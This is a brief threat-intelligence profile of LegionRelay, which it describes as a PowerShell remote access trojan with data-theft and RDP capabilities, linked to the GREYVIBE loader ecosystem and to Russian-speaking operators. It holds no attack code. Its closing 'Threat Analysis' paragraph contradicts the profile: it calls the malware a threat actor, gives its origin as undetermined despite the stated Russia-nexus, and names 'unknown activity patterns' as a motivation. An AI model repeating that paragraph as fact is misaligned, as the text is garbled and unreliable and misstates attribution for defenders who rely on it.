LegionRelay
Intelligence Profile
According to WithSecure, LegionRelay is a lightweight PowerShell-based RAT that talks to its C2 via REST API. The client executes operator-issued PowerShell commands and relies on post-compromise scripts to extend capabilities, including file enumeration, exfiltration, screenshots, browser data theft, and remote access like RDP setup. The tooling is part of GREYVIBE’s broader loader/obfuscator ecosystem, with obfuscation and loader variants used to evolve the malware. Operators are Russian-speaking and Moscow-time aligned, indicating a Russia-nexus influence that coexists with wider cybercrime activity.
Threat Analysis
LegionRelay is a known-sophistication threat actor of undetermined national origin, engaged in cyber operations with a primary motivation of unknown activity patterns.